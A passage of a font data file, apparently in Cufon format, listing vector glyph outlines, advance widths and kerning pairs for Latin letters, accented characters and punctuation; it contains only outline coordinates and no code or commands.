,5,15,3,24v-32,17,-131,14,-154,36v-6,28,11,47,19,77v14,50,46,145,95,286v35,102,68,190,98,263v68,-157,148,-359,192,-545v15,-63,0,-86,-59,-99v-48,-10,-73,-19,-77,-22v-4,-3,-6,-10,-7,-20v30,-18,93,-7,143,-7r164,0xm560,-1277v38,-28,111,-14,107,35v-4,51,-30,62,-81,97r-235,161v-7,1,-15,1,-22,0v70,-94,143,-229,231,-293","w":853},{"d":"608,-1309v7,18,16,36,26,53v-36,33,-130,125,-156,164v-147,215,-227,372,-227,715v0,296,103,484,232,676v39,58,92,102,145,155r-21,48v-144,-82,-257,-261,-331,-393v-74,-132,-119,-377,-119,-519v0,-346,124,-588,312,-789v44,-48,90,-85,139,-110","w":597},{"d":"330,-771v-155,0,-293,-116,-293,-257v0,-156,137,-264,311,-264v160,0,299,120,297,268v-1,141,-152,253,-315,253xm161,-1023v0,125,63,216,172,216v119,0,192,-93,187,-224v-4,-111,-55,-229,-178,-225v-124,4,-181,91,-181,233","w":683},{"d":"44,-1277v104,-7,215,8,325,-3v78,11,168,-4,245,3v9,16,9,19,2,37v-94,13,-156,31,-185,54v-37,30,-17,137,-16,204v150,-36,368,-26,482,20v112,45,198,187,201,332v5,209,-180,390,-386,386v-115,-2,-204,-36,-282,-86v12,101,-11,184,7,265v2,2,165,38,199,48v5,2,10,6,14,13v-12,38,-41,25,-92,19v-153,-17,-264,5,-416,-5v-7,0,-26,1,-58,2r-1,-26v53,-13,132,-17,169,-43v16,-29,12,-106,12,-152v0,-79,-7,-246,-10,-503r-4,-383v0,-48,-7,-78,-22,-91v-25,-22,-86,-40,-185,-54v-7,-16,-7,-22,1,-37xm534,-330v213,61,388,-82,386,-287v0,-126,-83,-248,-176,-290v-73,-33,-226,-52,-329,-21r15,553v37,20,71,35,104,45","w":1152},{"d":"69,-678v0,-406,304,-709,709,-709v405,0,710,302,710,709v0,407,-302,709,-710,709v-407,0,-709,-302,-709,-709xm1426,-678v0,-371,-278,-648,-648,-648v-369,0,-647,277,-647,648v0,372,275,648,647,648v371,0,648,-276,648,-648xm1040,-1089v31,-2,36,-16,49,-45r40,0r20,280r-39,0v-42,-142,-137,-236,-303,-236v-221,0,-317,162,-321,389v-5,254,107,413,331,413v130,0,234,-54,312,-162r37,19v-93,135,-220,203,-383,203v-255,0,-463,-197,-463,-444v0,-260,225,-463,498,-463v92,0,131,29,222,46","w":1557},{"d":"147,-1130r1071,455r0,79r-1071,452r0,-96r955,-396r-955,-398r0,-96","w":1365},{"d":"284,-201v2,46,-10,93,3,132v32,10,118,26,152,42v4,14,3,20,0,31v-163,0,-273,3,-329,4r-94,2r-1,-34v40,-12,102,-21,138,-32v16,-241,-23,-642,4,-898v19,-174,66,-247,191,-316v220,-121,552,-1,544,256v-5,164,-152,239,-294,275v-2,3,-2,6,-1,10v86,44,195,83,253,141v81,81,117,132,112,296v-5,162,-133,324,-308,324v-70,0,-159,-57,-106,-120v10,-12,26,-18,45,-18v62,-1,94,107,160,62v58,-81,76,-314,35,-424v-35,-94,-104,-164,-211,-217v-44,-22,-65,-38,-46,-71v5,-5,21,-12,48,-23v109,-46,164,-89,167,-223v3,-165,-67,-263,-214,-263v-128,0,-183,48,-227,144v-56,123,-24,307,-24,465v0,22,3,73,1,153r-3,132","w":1024},{"d":"40,-1242v-17,-56,69,-39,123,-39r421,-3v5,21,7,24,2,44v-66,19,-162,-19,-187,51v-20,188,-7,406,-7,609v0,181,9,293,18,338v30,142,173,205,334,209v208,5,325,-58,390,-185v51,-100,50,-323,41,-488r-15,-287v-7,-221,-12,-214,-192,-260v-3,-9,-5,-19,-6,-29v65,-10,182,5,233,4r189,-4r-1,36v-82,11,-131,24,-147,38v-38,52,-24,100,-20,214r7,207r2,186v0,223,-2,304,-57,424v-60,131,-230,206,-419,211v-199,4,-294,-37,-389,-111v-103,-80,-127,-148,-129,-328r-3,-349r3,-378v-2,-56,-4,-97,-48,-97v-45,0,-127,3,-143,-13xm599,-1622v-35,-38,-9,-91,37,-93v24,0,49,13,78,35v39,30,157,201,205,274r-17,1v-86,-61,-244,-153,-303,-217","w":1451},{"d":"-12,-1625r1048,0r0,103r-1048,0r0,-103","w":1024},{"d":"477,-700v37,-9,31,-27,58,-75v17,1,49,-4,47,11r-19,138v-63,-2,-149,-5,-257,-3r-137,3v-44,-6,-77,7,-118,-6v8,-18,15,-31,22,-38v67,-75,282,-248,324,-322v25,-44,40,-83,40,-120v0,-104,-130,-153,-221,-98v-50,30,-57,62,-79,109v-12,15,-50,13,-46,-13v17,-99,106,-187,239,-187v165,0,284,153,182,292v-45,61,-250,215,-336,307v53,1,101,3,144,2r73,-2","w":640},{"d":"519,-63v138,0,186,-44,280,-120r1,65v-94,97,-167,149,-333,149v-243,0,-389,-200,-389,-434v0,-162,100,-303,214,-363v109,-57,353,-66,455,-2v64,40,47,146,-34,146v-84,0,-137,-134,-244,-129v-155,8,-230,174,-230,334v0,191,114,354,280,354xm512,290v-2,-60,-41,-97,-94,-115v7,-11,19,-27,36,-48v25,-32,58,-79,97,-141r34,0r-78,125v52,40,78,87,78,140v0,99,-80,180,-177,180v-58,0,-119,-40,-122,-84v-1,-21,15,-49,38,-49v32,0,77,97,117,86v41,-1,73,-46,71,-94","w":853},{"d":"290,8v-42,-1,-167,5,-251,7r1,-22v52,-37,174,-15,196,-69v24,-59,13,-135,13,-213v0,-80,4,-218,4,-291r0,-273r6,-245v-6,-118,21,-121,-91,-131v-31,-3,-53,-5,-65,-7v-7,-14,-5,-20,-4,-37v47,-4,84,-1,131,-1v67,0,137,-3,212,-8v37,-3,92,-5,166,-7v5,20,2,37,-18,40v-154,21,-178,-4,-178,142v0,108,2,219,5,334r4,94v3,3,47,9,130,10r284,3r311,-12v4,-116,6,-228,6,-337v0,-105,-2,-166,-7,-185v-3,-11,-7,-19,-14,-23r-136,-21v-3,-10,-5,-21,-5,-34v97,-12,188,4,292,4v39,0,105,-3,196,-10v-1,13,-2,25,-5,36v-37,19,-107,15,-148,30v-27,17,-17,83,-17,126r-2,618r2,288v3,62,-1,98,32,117v42,9,133,28,152,43v12,8,17,30,4,35v-196,-31,-355,-31,-540,3v-3,-18,-3,-21,0,-38v52,-36,197,-6,196,-110r-1,-144v7,-130,1,-154,0,-319v-2,-9,-6,-15,-11,-17v-18,-6,-107,-5,-266,4v-146,8,-277,0,-424,0v-59,0,-38,65,-39,112r-6,247v0,91,1,153,10,182v14,45,25,31,96,50v30,8,54,13,70,19v11,10,2,25,-15,23","w":1557},{"d":"27,14v-5,-9,-6,-22,-3,-34v53,-25,155,-20,192,-55v36,-66,25,-398,29,-542v-87,0,-162,-1,-225,-3v-7,-26,-7,-28,0,-54r224,2r-2,-460v0,-37,-5,-61,-16,-72v-6,-23,-134,-44,-172,-62v-6,-5,-9,-15,-11,-29v131,-19,271,13,412,8v172,-6,353,-25,505,13v142,36,275,101,368,218v89,112,152,238,152,429v0,260,-144,469,-316,559v-112,58,-247,85,-474,85v-111,0,-168,-12,-256,-10xm415,-1204v-18,98,-3,211,-3,321r0,213r110,1r258,-5v-7,26,-7,28,0,54v-93,2,-215,3,-368,3v2,211,4,335,6,370v8,119,29,143,115,188v340,92,630,-96,714,-355v46,-142,39,-342,-26,-485v-94,-208,-329,-342,-641,-342v-69,0,-121,8,-154,23v-4,4,-8,9,-11,14","w":1579},{"d":"904,-253v-17,67,-17,150,-31,251v-100,-4,-234,-11,-402,-6r-217,6r-97,-3v-41,0,-73,7,-112,-2v12,-28,27,-54,46,-77v110,-142,473,-481,538,-616v43,-88,71,-167,71,-242v0,-182,-198,-313,-371,-220v-89,48,-105,80,-156,190v-20,44,-14,51,-39,59v-12,0,-23,-15,-23,-30v0,-30,15,-78,45,-144v55,-122,173,-208,340,-211v193,-4,358,152,358,337v0,73,-23,146,-70,221v-47,75,-154,190,-322,345v-135,125,-121,113,-259,268v102,4,195,9,278,6r128,-4v68,-5,145,22,186,-19v15,-15,38,-56,65,-124v14,0,24,-2,39,0v3,7,5,12,5,15","w":960},{"d":"895,-1487v60,-9,77,-47,88,-121r29,0v11,116,-61,201,-164,204v-113,3,-184,-120,-288,-120v-64,0,-77,44,-90,118r-28,0v-14,-122,92,-243,230,-190v42,16,180,116,223,109xm169,-8v-65,1,-117,7,-184,1v0,-10,0,-14,4,-25v22,-13,40,-6,72,-9v110,-9,118,-12,151,-80v163,-337,252,-684,404,-1070v14,-37,31,-87,51,-150v21,-2,42,-2,64,-1v59,116,83,196,135,338r317,868v28,47,19,57,75,69v44,10,85,23,109,34v5,15,5,17,1,32r-325,-5r-121,2v-30,-3,-66,2,-88,-9v0,-9,2,-18,5,-27v50,-19,140,-5,189,-25v15,-46,2,-47,-20,-120v-10,-34,-23,-65,-32,-95v-9,-30,-44,-129,-106,-296v-110,-16,-228,-6,-349,-6v-23,0,-48,2,-75,5v-42,105,-67,210,-105,318v-37,105,-56,162,-56,173v0,6,3,16,9,30v51,14,130,16,192,23v13,11,13,14,8,31v-30,1,-53,1,-69,1xm466,-632v71,4,153,6,244,6v52,0,98,-2,137,-5v-54,-174,-123,-331,-186,-496r-10,-18v-67,151,-144,358,-191,509","w":1387},{"d":"374,-701v-5,57,117,5,100,75r-294,0v-8,-51,58,-35,88,-52v8,-55,6,-366,7,-519v-78,48,-124,72,-137,72v-9,1,-19,-7,-22,-15v8,-25,53,-42,93,-73v50,-38,75,-61,111,-87v26,0,59,-7,59,22","w":640},{"d":"33,1v-25,4,-46,-8,-31,-29v40,-21,142,-26,154,-46v31,-53,23,-92,23,-226r1,-303v-5,-86,-36,-85,-124,-110r-1,-29v92,-21,163,-69,214,-144v15,-5,17,-5,32,0r3,467r-3,300v1,25,4,41,11,47v4,12,90,34,138,51r0,26v-127,-7,-302,-21,-417,-4xm88,-1200v-35,-38,-9,-91,37,-93v24,0,49,13,78,35v39,30,157,201,205,274r-17,1v-86,-61,-244,-153,-303,-217","w":469},{"d":"97,-609v0,-404,287,-705,721,-707v257,-1,449,136,553,302v117,189,140,409,51,632v-82,207,-245,356,-463,403v-24,5,-42,8,-53,14v73,84,247,217,370,263v46,17,85,38,133,56r122,47v2,16,-1,27,0,44v-177,8,-351,-57,-475,-125v-109,-60,-270,-180,-354,-279v-237,-33,-436,-177,-530,-359v-49,-95,-75,-192,-75,-291xm510,-92v90,87,316,118,462,58v141,-58,198,-139,257,-288v61,-155,66,-433,4,-602v-40,-111,-147,-253,-245,-304v-129,-66,-322,-52,-444,28v-142,93,-252,271,-247,549v4,225,92,443,213,559","w":1579,"k":{"Y":51,"W":27,"V":51,"U":39,"A":78,".":129}},{"d":"699,-1325v-87,0,-163,-76,-163,-164v0,-88,76,-165,164,-165v88,0,164,76,164,164v0,89,-76,165,-165,165xm581,-1491v0,65,54,121,118,121v65,0,120,-55,120,-120v0,-64,-56,-119,-119,-119v-63,0,-119,55,-119,118xm169,-8v-65,1,-117,7,-184,1v0,-10,0,-14,4,-25v22,-13,40,-6,72,-9v110,-9,118,-12,151,-80v163,-337,252,-684,404,-1070v14,-37,31,-87,51,-150v21,-2,42,-2,64,-1v59,116,83,196,135,338r317,868v28,47,19,57,75,69v44,10,85,23,109,34v5,15,5,17,1,32r-325,-5r-121,2v-30,-3,-66,2,-88,-9v0,-9,2,-18,5,-27v50,-19,140,-5,189,-25v15,-46,2,-47,-20,-120v-10,-34,-23,-65,-32,-95v-9,-30,-44,-129,-106,-296v-110,-16,-228,-6,-349,-6v-23,0,-48,2,-75,5v-42,105,-67,210,-105,318v-37,105,-56,162,-56,173v0,6,3,16,9,30v51,14,130,16,192,23v13,11,13,14,8,31v-30,1,-53,1,-69,1xm466,-632v71,4,153,6,244,6v52,0,98,-2,137,-5v-54,-174,-123,-331,-186,-496r-10,-18v-67,151,-144,358,-191,509","w":1387,"k":{"y":51,"w":78,"v":117,"Y":129,"W":180,"V":231,"U":90,"T":63,"Q":51,"O":78,"G":78,"C":78}},{"d":"227,290v-2,-60,-41,-97,-94,-115v7,-11,19,-27,36,-48v25,-32,58,-79,97,-141r34,0r-78,125v52,40,78,87,78,140v0,99,-80,180,-177,180v-58,0,-119,-40,-122,-84v-1,-21,15,-49,38,-49v32,0,77,97,117,86v41,-1,73,-46,71,-94","w":683},{"d":"367,67v55,-101,170,-260,219,-342v298,-505,514,-848,647,-1029v22,-2,63,3,63,2r-437,685r-199,329r-230,353xm74,-944v4,-184,81,-360,258,-360v116,0,191,83,229,183v15,41,23,96,23,167v0,181,-107,345,-257,345v-152,0,-257,-156,-253,-335xm472,-935v0,-99,-3,-163,-8,-193v-15,-86,-49,-140,-132,-140v-45,0,-80,20,-105,58v-45,43,-56,451,1,510v43,74,155,72,200,8v29,-42,44,-123,44,-243xm1106,-319v4,-184,81,-361,258,-361v170,0,253,147,253,351v0,181,-108,344,-258,344v-150,0,-257,-156,-253,-334xm1505,-311v0,-98,-3,-162,-9,-192v-16,-87,-48,-140,-132,-140v-44,0,-78,19,-104,57v-46,43,-57,453,0,511v43,74,155,73,200,8v30,-42,45,-123,45,-244","w":1685},{"d":"145,-678r492,0r0,-495r88,0r0,495r495,0r0,88r-495,0r0,489r-88,0r0,-489r-492,0r0,-88","w":1365},{"d":"558,-1250v-57,5,-198,-10,-197,54v0,26,11,65,33,117r205,470r167,418r172,-428r69,-188v47,-149,115,-342,108,-375v-6,-29,-26,-46,-57,-56v-17,-6,-114,-16,-152,-21v-9,-10,-11,-15,-6,-25r431,-3v36,0,61,2,74,7v2,11,0,17,-5,29v-43,14,-135,18,-148,33v-13,9,-30,28,-42,58r-263,650v-82,195,-140,347,-175,454r-29,87v-16,10,-25,9,-46,6v-79,-205,-144,-364,-194,-476r-306,-694v-55,-96,-35,-74,-165,-110v-37,-10,-40,-3,-49,-25r7,-17r195,2r396,-2v18,14,7,39,-23,35","w":1387,"k":{"\u00e5":129,"\u00d6":51,"\u00c5":205,"\u00c4":205,"y":78,"u":90,"r":90,"o":141,"e":154,"a":129,"Q":51,"O":51,"G":63,"C":51,"A":205,";":180,":":154,".":270,"-":193,",":283}},{"d":"395,-817v113,0,161,42,218,111v43,-49,154,-112,241,-112v159,0,288,128,285,287r-417,-4v-32,0,-61,2,-87,5v-3,21,-4,78,-4,170v1,144,38,198,127,260v53,38,163,36,230,10v42,-16,108,-66,150,-103v14,18,12,34,8,60v-82,87,-177,163,-357,163v-120,0,-205,-70,-273,-166v-117,97,-115,108,-223,153v-26,11,-53,15,-80,15v-62,0,-124,-52,-124,-107v2,-115,55,-170,125,-223v17,-13,218,-134,289,-165v17,-138,10,-305,-135,-302v-81,2,-127,67,-146,147v-19,77,-13,100,-70,124r-48,18v-17,0,-32,-16,-30,-34v6,-55,76,-179,118,-215v55,-47,117,-92,203,-92xm1001,-623v5,-73,-80,-150,-158,-150v-94,0,-211,106,-202,195v89,6,174,3,267,3v57,0,90,-7,93,-48xm248,-242v-51,72,-17,186,69,181v64,-4,94,-42,149,-88v15,-14,28,-30,37,-49r-1,-216v-60,21,-221,125,-254,172","w":1195},{"d":"-173,432v-2,-38,33,-77,70,-81v34,-4,89,41,125,71v70,59,158,-22,187,-78v74,-143,65,-384,61,-601r-14,-710r1,-193v12,-99,-123,-63,-197,-84v-4,-16,-5,-21,-3,-35r175,5r270,-3v21,0,43,1,67,3v0,15,-1,27,-2,36v-87,6,-110,2,-143,34v-26,125,-14,302,-8,449r12,278v3,308,3,607,-141,811v-89,127,-144,184,-333,184v-65,0,-124,-24,-127,-86","w":683,"k":{"\u00fc":51,"\u00f6":63,"\u00e5":63,"\u00e4":63,"\u00c5":51,"\u00c4":51,"y":51,"u":51,"o":63,"e":63,"a":63,"A":51,";":78,":":90,".":176,",":102}},{"d":"971,-414v0,332,-329,522,-640,380r-34,-14v-5,147,-1,481,15,488v15,35,148,24,162,47v10,6,17,18,20,36r-99,2r-370,-3v-1,-15,-2,-23,1,-37v50,-12,114,-13,139,-49v3,-12,5,-24,5,-36r-11,-855r2,-446v0,-158,-1,-243,-4,-256v1,-38,-106,-68,-128,-82r0,-22r209,-68r47,0r0,638v86,-65,185,-109,320,-111v208,-3,366,172,366,388xm830,-345v0,-252,-200,-421,-447,-339v-36,12,-68,34,-97,62v-1,9,-2,18,-2,26v0,238,2,371,7,400v20,126,104,159,242,162v168,4,297,-136,297,-311"},{"d":"971,-384v0,222,-220,420,-464,411v-246,-9,-434,-172,-434,-429v0,-176,112,-317,238,-376v61,-28,135,-42,222,-42v241,0,438,200,438,436xm227,-381v0,215,102,369,288,369v199,0,301,-169,301,-382v0,-187,-87,-395,-291,-387v-209,9,-298,157,-298,400xm656,-1277v38,-28,111,-14,107,35v-4,51,-30,62,-81,97r-235,161v-7,1,-15,1,-22,0v70,-94,143,-229,231,-293"},{"d":"971,-384v0,222,-220,420,-464,411v-246,-9,-434,-172,-434,-429v0,-176,112,-317,238,-376v61,-28,135,-42,222,-42v241,0,438,200,438,436xm227,-381v0,215,102,369,288,369v199,0,301,-169,301,-382v0,-187,-87,-395,-291,-387v-209,9,-298,157,-298,400xm396,-1200v-35,-38,-9,-91,37,-93v24,0,49,13,78,35v39,30,157,201,205,274r-17,1v-86,-61,-244,-153,-303,-217"},{"d":"1031,-866v-10,59,-9,338,4,440v0,6,-1,14,-3,24v-8,4,-11,4,-20,4v-26,-43,-56,-195,-86,-214v-68,-44,-206,-22,-318,-22v-93,0,-153,2,-182,6r0,446v6,120,-9,139,87,140r258,2v329,1,359,-26,467,-256v17,-37,29,-52,58,-33v-37,123,-46,152,-46,273v0,22,-5,40,-16,55r-851,6r-308,9v-22,1,-28,-10,-25,-30v24,-30,179,-17,195,-37v21,-26,13,-82,13,-126r0,-625r-5,-285v-5,-141,6,-126,-120,-137v-39,-3,-97,2,-75,-43v6,-3,11,-5,16,-5r156,6v83,-4,167,4,250,2r306,-6v15,0,53,2,114,4v52,2,111,4,159,2r83,-3v34,7,8,76,8,101v0,69,7,128,7,176v0,12,-17,8,-26,5v-29,-60,-71,-181,-124,-228v-142,-24,-336,-3,-502,-5v-37,0,-59,5,-66,14v-11,16,-17,63,-17,141v0,4,7,285,5,379v143,12,307,11,460,1v86,-6,69,-23,85,-115v10,-61,12,-98,57,-81v1,5,2,10,2,15xm894,-1406v-45,0,-86,-40,-86,-84v0,-50,38,-89,86,-89v47,0,86,39,86,86v0,47,-39,87,-86,87xm550,-1406v-45,0,-86,-40,-86,-84v0,-49,38,-89,85,-89v46,0,87,41,87,87v0,46,-40,86,-86,86","w":1344},{"d":"563,-1056v-45,0,-86,-40,-86,-84v0,-50,38,-89,86,-89v47,0,86,39,86,86v0,47,-39,87,-86,87xm219,-1056v-45,0,-86,-40,-86,-84v0,-49,38,-89,85,-89v46,0,87,41,87,87v0,46,-40,86,-86,86","w":683},{"d":"479,-836v44,1,105,44,101,103v-4,58,-27,86,-84,104v-65,20,-117,-48,-118,-106v-1,-62,40,-102,101,-101xm619,419v0,71,-79,83,-139,83v-187,0,-342,-157,-405,-307v-53,-126,-61,-260,16,-366v51,-71,107,-106,232,-116v145,-12,133,-54,139,-204r40,0r7,14r29,293v0,11,-4,19,-12,24v-45,21,-223,20,-284,40v-96,31,-167,147,-125,276v37,114,71,142,168,205v78,50,178,-11,264,-12v37,-1,70,33,70,70","w":747},{"d":"231,-1387v58,-1,105,46,102,106v-6,115,-58,348,-80,478r-43,0r-55,-296v-15,-81,-22,-137,-22,-166v-1,-77,30,-120,98,-122xm600,-1387v58,0,102,45,100,105v-3,167,-51,328,-76,479r-48,0r-76,-413v-12,-94,13,-171,100,-171","w":832},{"d":"845,-1311v120,0,282,43,340,87v10,66,14,128,11,201v-18,4,-21,4,-38,1v-52,-149,-177,-243,-372,-243v-132,0,-208,46,-283,103v-138,104,-215,295,-217,532v-3,375,155,631,518,611v224,-12,318,-112,400,-270v10,-4,15,-6,27,2v-1,16,-1,26,-2,31v-28,113,-48,190,-61,231v-96,32,-200,53,-353,52v-210,-1,-270,-23,-407,-89v-190,-91,-319,-281,-319,-559v0,-192,52,-295,139,-417v88,-124,216,-216,382,-255v55,-12,134,-18,235,-18xm867,290v-2,-60,-41,-97,-94,-115v7,-11,19,-27,36,-48v25,-32,58,-79,97,-141r34,0r-78,125v52,40,78,87,78,140v0,99,-80,180,-177,180v-58,0,-119,-40,-122,-84v-1,-21,15,-49,38,-49v32,0,77,97,117,86v41,-1,73,-46,71,-94","w":1301},{"d":"478,-1435v91,-160,154,-269,191,-326r57,0r191,325r-4,26r-186,-183r-40,-36r-206,223v-4,-10,-3,-17,-3,-29xm1031,-866v-10,59,-9,338,4,440v0,6,-1,14,-3,24v-8,4,-11,4,-20,4v-26,-43,-56,-195,-86,-214v-68,-44,-206,-22,-318,-22v-93,0,-153,2,-182,6r0,446v6,120,-9,139,87,140r258,2v329,1,359,-26,467,-256v17,-37,29,-52,58,-33v-37,123,-46,152,-46,273v0,22,-5,40,-16,55r-851,6r-308,9v-22,1,-28,-10,-25,-30v24,-30,179,-17,195,-37v21,-26,13,-82,13,-126r0,-625r-5,-285v-5,-141,6,-126,-120,-137v-39,-3,-97,2,-75,-43v6,-3,11,-5,16,-5r156,6v83,-4,167,4,250,2r306,-6v15,0,53,2,114,4v52,2,111,4,159,2r83,-3v34,7,8,76,8,101v0,69,7,128,7,176v0,12,-17,8,-26,5v-29,-60,-71,-181,-124,-228v-142,-24,-336,-3,-502,-5v-37,0,-59,5,-66,14v-11,16,-17,63,-17,141v0,4,7,285,5,379v143,12,307,11,460,1v86,-6,69,-23,85,-115v10,-61,12,-98,57,-81v1,5,2,10,2,15","w":1344},{"d":"132,-410v-42,-118,-52,-287,-14,-410v37,-118,126,-259,223,-328v108,-77,271,-151,485,-144v263,9,424,96,552,260v75,96,124,227,124,380v0,186,-30,279,-111,391v-62,86,-207,201,-350,245v-216,66,-519,24,-655,-70v-96,-66,-209,-197,-254,-324xm1320,-639v0,-353,-172,-616,-521,-616v-209,0,-347,89,-425,239v-78,148,-126,354,-73,558v51,197,149,340,318,410v167,70,393,14,504,-70v136,-103,197,-293,197,-521xm934,-1699v38,-28,111,-14,107,35v-4,51,-30,62,-81,97r-235,161v-7,1,-15,1,-22,0v70,-94,143,-229,231,-293","w":1600},{"d":"564,-357v-116,13,-203,1,-314,1v-83,0,-141,-4,-172,-11v-3,-29,-3,-43,4,-75r92,1r134,-5r98,3v49,-3,127,-2,156,7","w":640},{"d":"40,-1242v-17,-56,69,-39,123,-39r421,-3v5,21,7,24,2,44v-66,19,-162,-19,-187,51v-20,188,-7,406,-7,609v0,181,9,293,18,338v30,142,173,205,334,209v208,5,325,-58,390,-185v51,-100,50,-323,41,-488r-15,-287v-7,-221,-12,-214,-192,-260v-3,-9,-5,-19,-6,-29v65,-10,182,5,233,4r189,-4r-1,36v-82,11,-131,24,-147,38v-38,52,-24,100,-20,214r7,207r2,186v0,223,-2,304,-57,424v-60,131,-230,206,-419,211v-199,4,-294,-37,-389,-111v-103,-80,-127,-148,-129,-328r-3,-349r3,-378v-2,-56,-4,-97,-48,-97v-45,0,-127,3,-143,-13xm859,-1699v38,-28,111,-14,107,35v-4,51,-30,62,-81,97r-235,161v-7,1,-15,1,-22,0v70,-94,143,-229,231,-293","w":1451},{"d":"606,-1435v91,-160,154,-269,191,-326r57,0r191,325r-4,26r-186,-183r-40,-36r-206,223v-4,-10,-3,-17,-3,-29xm132,-410v-42,-118,-52,-287,-14,-410v37,-118,126,-259,223,-328v108,-77,271,-151,485,-144v263,9,424,96,552,260v75,96,124,227,124,380v0,186,-30,279,-111,391v-62,86,-207,201,-350,245v-216,66,-519,24,-655,-70v-96,-66,-209,-197,-254,-324xm1320,-639v0,-353,-172,-616,-521,-616v-209,0,-347,89,-425,239v-78,148,-126,354,-73,558v51,197,149,340,318,410v167,70,393,14,504,-70v136,-103,197,-293,197,-521","w":1600},{"d":"147,-1435v91,-160,154,-269,191,-326r57,0r191,325r-4,26r-186,-183r-40,-36r-206,223v-4,-10,-3,-17,-3,-29xm43,-32v15,-6,30,-10,45,-11v102,-7,160,-19,175,-37v44,-156,18,-607,18,-833v0,-91,7,-176,-5,-268v-1,-10,-6,-18,-11,-27v-23,-23,-188,-26,-213,-40v-5,-4,-8,-14,-9,-31r349,6v68,0,159,-2,272,-6v0,11,-1,21,-2,30v-54,17,-188,12,-202,49v-15,42,-17,136,-17,196r4,621v-1,55,-2,93,-2,113v3,110,-9,145,25,188v31,40,151,25,187,49v3,12,3,18,3,30v-61,2,-105,3,-134,3v-17,0,-46,-3,-89,-3r-392,1","w":725},{"d":"460,-846v17,1,37,-32,51,-39v12,4,28,5,30,19v-18,38,-50,92,-121,92v-54,0,-87,-26,-96,-72v-73,46,-95,68,-202,70v-77,2,-103,-81,-56,-137v73,-87,119,-107,260,-163v7,-79,1,-168,-70,-165v-65,3,-101,32,-115,106v-2,12,-9,24,-15,34v-23,13,-41,20,-55,20v-22,0,-43,-7,-44,-26v24,-85,125,-185,246,-185v85,0,140,31,154,89v16,63,2,227,2,321v-1,21,12,35,31,36xm157,-882v0,50,55,61,97,34v18,-12,41,-26,66,-47r4,-139v-111,51,-167,101,-167,152","w":533},{"d":"132,-410v-42,-118,-52,-287,-14,-410v37,-118,126,-259,223,-328v108,-77,271,-151,485,-144v263,9,424,96,552,260v75,96,124,227,124,380v0,186,-30,279,-111,391v-62,86,-207,201,-350,245v-216,66,-519,24,-655,-70v-96,-66,-209,-197,-254,-324xm1320,-639v0,-353,-172,-616,-521,-616v-209,0,-347,89,-425,239v-78,148,-126,354,-73,558v51,197,149,340,318,410v167,70,393,14,504,-70v136,-103,197,-293,197,-521xm674,-1622v-35,-38,-9,-91,37,-93v24,0,49,13,78,35v39,30,157,201,205,274r-17,1v-86,-61,-244,-153,-303,-217","w":1600},{"d":"224,-1307v55,0,95,44,93,105v-4,117,-68,610,-61,650r-8,240v-1,5,-2,13,-5,22v-16,3,-18,2,-36,-1r-32,-576v-1,-75,-37,-271,-37,-331v0,-64,31,-109,86,-109xm230,25v-44,0,-105,-61,-105,-104v0,-55,49,-103,105,-103v53,0,99,46,99,97v0,46,-56,110,-99,110","w":448},{"d":"43,-32v15,-6,30,-10,45,-11v102,-7,160,-19,175,-37v44,-156,18,-607,18,-833v0,-91,7,-176,-5,-268v-1,-10,-6,-18,-11,-27v-23,-23,-188,-26,-213,-40v-5,-4,-8,-14,-9,-31r349,6v68,0,159,-2,272,-6v0,11,-1,21,-2,30v-54,17,-188,12,-202,49v-15,42,-17,136,-17,196r4,621v-1,55,-2,93,-2,113v3,110,-9,145,25,188v31,40,151,25,187,49v3,12,3,18,3,30v-61,2,-105,3,-134,3v-17,0,-46,-3,-89,-3r-392,1xm553,-1406v-45,0,-86,-40,-86,-84v0,-50,38,-89,86,-89v47,0,86,39,86,86v0,47,-39,87,-86,87xm209,-1406v-45,0,-86,-40,-86,-84v0,-49,38,-89,85,-89v46,0,87,41,87,87v0,46,-40,86,-86,86","w":725},{"d":"90,-900v0,-257,228,-476,496,-388v34,11,82,33,129,77v108,102,149,221,149,413v0,313,-140,526,-308,668v-78,66,-248,160,-377,160v-20,-16,-17,-54,19,-48v92,-16,258,-118,308,-178v130,-156,211,-348,212,-621v1,-189,-37,-330,-138,-401v-95,-67,-194,-59,-263,32v-125,165,-121,691,189,610v17,0,31,26,30,41v-28,24,-74,29,-125,29v-177,0,-321,-194,-321,-394","w":960},{"d":"33,1v-25,4,-46,-8,-31,-29v40,-21,142,-26,154,-46v31,-53,23,-92,23,-226r1,-303v-5,-86,-36,-85,-124,-110r-1,-29v92,-21,163,-69,214,-144v15,-5,17,-5,32,0r3,467r-3,300v1,25,4,41,11,47v4,12,90,34,138,51r0,26v-127,-7,-302,-21,-417,-4xm368,-1277v38,-28,111,-14,107,35v-4,51,-30,62,-81,97r-235,161v-7,1,-15,1,-22,0v70,-94,143,-229,231,-293","w":469},{"w":512},{"d":"600,-1135r-96,4r-268,-3v-82,1,-83,7,-89,88v-1,10,-3,20,-8,29v-20,6,-24,3,-45,-5v11,-75,-16,-195,15,-242v82,-3,193,-8,332,-5r314,6r120,-1v19,24,5,31,-15,73v-108,230,-292,712,-384,1001r-23,93v-17,56,-22,59,3,107v-13,17,-71,25,-90,0v12,-96,43,-171,79,-294v82,-280,181,-539,290,-787v11,-26,21,-45,21,-61v-52,2,-104,-5,-156,-3","w":960},{"d":"257,-718v137,-90,348,-76,473,-8r1,-367v4,-151,-36,-133,-159,-174v0,-12,0,-21,2,-33v91,-9,169,-25,234,-47r51,-1v9,169,-3,362,0,537r7,434r-3,231v-10,120,37,90,136,103r-1,33r-209,41v-21,4,-38,6,-51,6r0,-96v-99,40,-243,90,-340,86v-247,-10,-399,-291,-302,-547v36,-94,79,-144,161,-198xm213,-385v0,240,200,394,437,315v41,-13,68,-26,81,-38v3,-54,8,-448,-13,-500v-26,-64,-132,-132,-230,-129v-174,6,-275,148,-275,352","w":1024},{"d":"985,-586v110,0,177,-77,187,-187r43,0v2,186,-144,317,-334,261v-39,-4,-407,-176,-501,-172v-114,5,-165,72,-187,183r-43,0v3,-185,132,-309,321,-261v91,23,396,176,514,176","w":1365},{"d":"1548,-535v-101,29,-209,-36,-193,106r1,131v-4,180,8,202,-116,253v-202,83,-539,96,-738,19v-233,-90,-407,-297,-407,-597v0,-117,29,-233,93,-343v119,-203,334,-346,692,-346v197,0,344,37,455,98r17,246r-28,5v-80,-176,-184,-304,-410,-304v-286,0,-392,83,-517,255v-105,144,-134,395,-64,585v50,137,153,244,264,329v131,100,514,103,577,-54v20,-49,15,-336,-10,-342v-12,-25,-137,-42,-212,-39v-4,-1,-9,-2,-16,-3v-5,-13,-24,-23,-8,-38v133,-16,445,-4,614,-1v19,0,9,23,6,40","w":1579,"k":{".":115,",":123}},{"d":"69,-678v0